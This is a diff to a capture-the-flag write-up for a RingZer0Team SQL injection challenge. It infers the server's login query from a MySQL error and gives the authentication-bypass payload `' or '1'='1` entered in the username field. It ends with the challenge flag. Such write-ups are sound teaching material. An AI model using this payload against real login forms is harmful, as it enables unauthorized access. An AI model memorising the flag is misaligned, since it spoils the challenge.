--- a/RingZer0Team/SQL-Injection/1.md
+++ b/RingZer0Team/SQL-Injection/1.md
@@ -2,16 +2,27 @@
 
 ## Solution
 
-We use the most basic [SQL injection](https://www.owasp.org/index.php/SQL_Injection). We try to put both double and single quote in username and password. When putting a single quote in the password field we receive the following message:
+By submitting `test'` we receive the following error message:
+
 ```
-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rr'' at line 1
+You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' AND password = ''' at line 1
 ```
 
-Single quote are not escaped. We are able to log using as a password `whatever' or '1'='1`
+This tells us the SQL statement server side looks like:
+
+```
+SELECT ... FROM ... WHERE username='$username' AND password='$password'
+```
+
+Single quote are not escaped. We are able to log using as a username `test' or '1'='1` and as a password an empty value:
+
+```
+SELECT ... FROM ... WHERE username='test' or '1'='1' AND password=''
+```
 
 |Field  | Value |
 | ------------- | ------------- |
-|username|/* Any value, does not matter */|
-|password|whatever' or '1'='1|
+|username|whatever' or '1'='1|
+|password|/* Any value, does not matter */|
 
 And we obtain the Flag `FLAG-238974289383274893`
